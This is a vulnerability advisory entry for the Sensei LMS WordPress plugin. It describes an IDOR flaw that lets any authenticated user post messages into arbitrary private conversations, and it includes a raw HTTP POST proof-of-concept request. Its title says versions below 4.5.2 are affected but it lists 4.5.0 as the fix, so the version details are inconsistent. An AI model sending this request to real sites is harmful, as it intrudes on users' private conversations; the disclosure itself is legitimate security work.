WordPress Plugin Vulnerabilities
Sensei LMS < 4.5.2 - Arbitrary Private Message Sending via IDOR
Description
The plugin does not ensure that the sender of a private message is either the teacher or the original sender, allowing any authenticated user to send messages to arbitrary private conversation via a IDOR attack. Note: Attackers are not able to see responses/messages between the teacher and student
Proof of Concept
POST /wp-comments-post.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 96 Connection: close Cookie: [any authenticated user] Upgrade-Insecure-Requests: 1 comment=<Any+comment>&submit=Post+Comment&comment_post_ID=111&comment_parent=0
Affects Plugins
Fixed in version 4.5.0
References
Classification
Miscellaneous
Original Researcher
Veshraj Ghimire
Submitter
Veshraj Ghimire
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2022-08-04 (about 10 months ago)
Added
2022-08-04 (about 10 months ago)
Last Updated
2023-04-12 (about 1 months ago)